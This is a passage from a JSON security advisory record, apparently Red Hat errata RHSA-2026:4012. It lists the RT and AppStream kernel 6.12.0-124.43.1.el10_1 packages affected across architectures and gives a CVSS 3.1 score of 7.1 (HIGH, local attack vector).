"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
